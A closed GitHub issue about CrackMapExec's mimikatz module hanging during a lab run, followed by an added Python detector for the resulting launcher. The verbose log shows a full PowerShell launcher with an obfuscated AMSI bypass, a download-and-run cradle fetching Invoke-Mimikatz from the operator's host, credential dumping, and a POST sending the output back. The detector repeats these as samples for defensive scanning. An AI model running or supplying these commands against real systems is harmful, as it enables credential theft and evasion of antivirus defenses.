Closed ymgh96 closed 2 years ago
Detailed issue explanation
Hello, I try to run the mimikatz module with crackmapexec but it gets stuck after the GET request and never gets the POST request. Where am I wrong?
Steps to reproduce
Command string used
crackmapexec --verbose smb 192.168.150.90 -u bob -p XXXX -d lab -M mimikatz --server-port 8080 --server http
CME verbose output (using the --verbose flag)
DEBUG Passed args: {'aesKey': None, 'amsi_bypass': None, 'clear_obfscripts': False, 'content': False, 'continue_on_success': False, 'cred_id': [], 'darrell': False, 'depth': None, 'disks': False, 'domain': 'lab', 'exclude_dirs': '', 'exec_method': None, 'execute': None, 'fail_limit': None, 'force_ps32': False, 'gen_relay_list': None, 'get_file': None, 'gfail_limit': None, 'groups': None, 'hash': [], 'jitter': None, 'kdcHost': None, 'kerberos': False, 'list_modules': False, 'local_auth': False, 'local_groups': None, 'loggedon_users': False, 'lsa': False, 'module': 'mimikatz', 'module_options': [], 'no_bruteforce': False, 'no_output': False, 'ntds': None, 'obfs': False, 'only_files': False, 'pass_pol': False, 'password': ['XXXX'], 'pattern': None, 'port': 445, 'protocol': 'smb', 'ps_execute': None, 'put_file': None, 'regex': None, 'rid_brute': None, 'sam': False, 'server': 'http', 'server_host': '0.0.0.0', 'server_port': 8080, 'sessions': False, 'share': 'C$', 'shares': False, 'show_module_options': False, 'smb_server_port': 445, 'spider': None, 'spider_folder': '.', 'target': ['192.168.150.90'], 'threads': 100, 'timeout': None, 'ufail_limit': None, 'username': ['bob'], 'users': None, 'verbose': True, 'wmi': None, 'wmi_namespace': 'root\\cimv2'}
DEBUG CME server type: http
DEBUG Using selector: EpollSelector
DEBUG Running
DEBUG Started thread poller
DEBUG Error creating SMBv1 connection to 192.168.150.90: Error occurs while reading from remote(104)
DEBUG Error creating SMBv1 connection to 192.168.150.90: Error occurs while reading from remote(104)
SMB 192.168.150.90 445 PC90 [*] Windows 10.0 Build 19041 x64 (name:PC90) (domain:lab) (signing:False) (SMBv1:False)
DEBUG add_credential(credtype=plaintext, domain=LAB, username=bob, password=XXXX, groupid=None, pillaged_from=None) => None
SMB 192.168.150.90 445 PC90 [+] lab\bob:XXXX (Pwn3d!)
DEBUG Generated PS IEX Launcher: [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('http://192.168.150.2:8080/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('http://192.168.150.2:8080/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()
DEBUG Generated PS command: [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('http://192.168.150.2:8080/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('http://192.168.150.2:8080/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()
DEBUG Target system is 192.168.150.90 and isFDQN is False
DEBUG StringBinding: pc90[65356]
DEBUG StringBinding: 172.16.70.30[65356]
DEBUG StringBinding: 192.168.150.90[65356]
DEBUG StringBinding
chosen: ncacn_ip_tcp:192.168.150.90[65356]
DEBUG Executed command via wmiexec
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "..."
MIMIKATZ 192.168.150.90 445 PC90 [+] Executed launcher
DEBUG Stopped thread poller
MIMIKATZ [*] Waiting on 1 host(s)
MIMIKATZ 192.168.150.90 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ [*] Waiting on 1 host(s)
CME Version (cme --version)
Version: 5.1.7dev Codename: U fancy huh?
OS
Kali 2021.3 Linux 5.10.0-kali9-amd64
Target OS
Windows 10 Version 21H1 (OS Build 19043.1288)
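As an added defender-side example (not code from the CME project or from this issue), the following Python scans process-creation command lines for the traits visible in the launcher above: the fragment-concatenated AMSI bypass, the plain-HTTP IEX/DownloadString cradle, the Mimikatz command string, and the char-code split/ForEach-Object decoding used by the obfuscated command; it also decodes that char-code layer so the inner cradle is caught. The event ids, the hand-built obfuscated sample and the benign command are constructed, not taken from the log.

```python
import re

# Indicators drawn from the launcher above; case-insensitive because the generated command randomises letter case
INDICATORS = [
    # AMSI bypass whose type and field names are built from concatenated string fragments
    ("amsi_initfailed_concat", re.compile(r"Assembly\.GetType\((?:'[^']*'\s*\+\s*)+'[^']*'\)\.GetField\(", re.I)),
    # download-and-execute cradle over plain HTTP
    ("iex_downloadstring_http", re.compile(r"(?:IEX|Invoke-Expression)\s*\(.*DownloadString\('http://", re.I)),
    # char-code decoding of a delimiter-split string, as in the obfuscated command
    ("charcode_split_decode", re.compile(r"\.split\([^)]*\)\s*\|\s*ForEach-Object\s*\{.*\[char\]\s*\[int\]", re.I)),
    ("mimikatz_logonpasswords", re.compile(r"sekurlsa::logonpasswords", re.I)),
]
CHARCODE_RE = re.compile(r"'([^']*)'\s*\.split\('([^']*)'\)", re.I)  # '<codes>'.split('<delims>')

def decode_charcode_strings(text):
    """Decode every '<codes>'.split('<delims>') payload so the inner script can be scanned too."""
    decoded = []
    for codes, delims in CHARCODE_RE.findall(text):
        try:
            parts = [p for p in re.split("[" + re.escape(delims) + "]", codes) if p]
            decoded.append("".join(chr(int(p)) for p in parts))
        except (ValueError, re.error):  # not a pure char-code string, or an empty delimiter set
            continue
    return decoded

def scan_command_line(cmd):
    """Sorted indicator names firing on cmd itself or on any char-code payload decoded from it."""
    hits = set()
    for layer in [cmd] + decode_charcode_strings(cmd):
        hits.update(name for name, rx in INDICATORS if rx.search(layer))
    return sorted(hits)

def scan_log(events):  # {event_id: hits} for every (event_id, command_line) on which an indicator fires
    return {eid: h for eid, cmd in events if (h := scan_command_line(cmd))}

# Constructed samples: the page's plain launcher, a hand-built char-code obfuscated cradle, a benign command
SAMPLE_LOG = [
    ("evt-1", "powershell.exe -exec bypass -noni -nop -w 1 -C \"try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+"
              "'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic')"
              ".SetValue($null, $true) }catch{} IEX (New-Object Net.WebClient).DownloadString('http://192.168.150.2"
              ":8080/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'\""),
    ("evt-2", "powershell.exe -exec bypass -noni -nop -w 1 -C \" INVOKe-eXpressION (-jOiN ('73&69~88{32&40~97{41&46~68{111"
              "&119~110{108&111~97{100&83~116{114&105~110{103&40~39{104&116~116{112&58~47{47&120~47{39&41'.sPLit('&~{') "
              "|FoReAcH-ObjeCt { ( [ChAr] [inT] $_) }) )\""),
    ("evt-3", 'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU -Descending"'),
]

if __name__ == "__main__":
    for eid, hits in scan_log(SAMPLE_LOG).items():
        print(eid, ", ".join(hits))
```

Running it reports evt-1 and evt-2 only; the obfuscated sample fires on the decoding pattern in the raw line and on the cradle in its decoded layer.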
The Mimikatz module is old and deprecated, try with the lsassy module!